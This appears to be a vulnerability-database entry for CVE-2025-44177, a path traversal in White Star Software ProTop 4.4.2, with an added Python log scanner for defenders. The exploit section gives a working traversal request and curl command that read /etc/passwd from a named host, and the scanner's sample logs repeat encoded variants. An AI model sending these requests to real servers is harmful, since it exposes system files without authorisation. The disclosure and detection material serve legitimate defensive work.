| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2025-44177 | 1 Jul 2025 18:26 | - | circl |
| White Star Software Protop path traversal vulnerability | 9 Jul 2025 00:00 | - | cnnvd |
| CVE-2025-44177 | 9 Jul 2025 00:00 | - | cve |
| CVE-2025-44177 | 9 Jul 2025 00:00 | - | cvelist |
| White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI) | 16 Jul 2025 00:00 | - | exploitdb |
| EUVD-2025-20833 | 3 Oct 2025 20:07 | - | euvd |
| White Star Software ProTop - Directory Traversal | 3 Jun 2026 06:04 | - | nuclei |
| CVE-2025-44177 | 9 Jul 2025 16:15 | - | nvd |
| Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check | 22 Jul 2021 00:00 | - | openvas |
| CVE-2025-44177 | 9 Jul 2025 16:15 | - | osv |

# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
# Date: 2025-07-09
# Exploit Author: Imraan Khan (Lich-Sec)
# Vendor Homepage: https://wss.com/
# Software Link: https://client.protop.co.za/
# Version: v4.4.2-2024-11-27
# Tested on: Ubuntu 22.04 / Linux
# CVE: CVE-2025-44177
# CWE: CWE-22 - Path Traversal
# Description:
# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2.
# An unauthenticated remote attacker can retrieve arbitrary files via
# URL-encoded traversal sequences in the `/pt3upd/` endpoint.
# Vulnerable Endpoint:
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: client.protop.co.za
User-Agent: curl/8.0
Accept: */*
# Example curl command:
curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'
# Notes:
# - Vulnerability confirmed on public instance at time of testing.
# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
# - The vendor was notified and a fix was issued.
# Disclosure Timeline:
# - Discovered: 2025-03-13
# - Disclosed to vendor: 2025-03-20
# - CVE Assigned: 2025-07-01
# - Public Disclosure: 2025-07-09
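
For defenders reviewing web server logs for this issue, the following added example (not part of the original exploit entry or the vendor's code) flags requests under `/pt3upd/` whose path resolves outside that prefix once percent-encoding is decoded. It goes slightly beyond the single request shown above by decoding repeatedly, so double-encoded separators are caught as well. It assumes combined-log-format access logs; the function names, file names and sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

PREFIX = "/pt3upd/"  # endpoint named in the advisory
# Request line inside a combined-log-format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(path, max_rounds=5):
    """Percent-decode repeatedly so a double-encoded '/' (%252f) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_prefix(raw_target):
    """True if a request under PREFIX resolves outside it after decoding."""
    path = urlsplit(raw_target).path  # drop the query string, keep raw path
    if not path.startswith(PREFIX):
        return False
    decoded = fully_decode(path).replace("\\", "/")
    resolved = posixpath.normpath(decoded)  # collapses "a/../b" and "../"
    return not (resolved + "/").startswith(PREFIX)

def scan(lines):
    """Return (line_number, request_target) for each suspicious log entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and escapes_prefix(match.group(1)):
            hits.append((number, match.group(1)))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Jul/2025:10:00:01 +0000] "GET /pt3upd/pt3upd.js HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Jul/2025:10:00:05 +0000] "GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1843 "-" "curl/8.0"',
    '203.0.113.9 - - [09/Jul/2025:10:00:09 +0000] "GET /pt3upd/..%252f..%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "curl/8.0"',
    '198.51.100.7 - - [09/Jul/2025:10:00:12 +0000] "GET /pt3upd/css/../img/logo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, target in scan(SAMPLE_LOG):
        print(f"line {number}: traversal out of {PREFIX} -> {target}")
```

A hit with a 200 status and a non-trivial response size is the one to prioritise, since it suggests a file was actually returned.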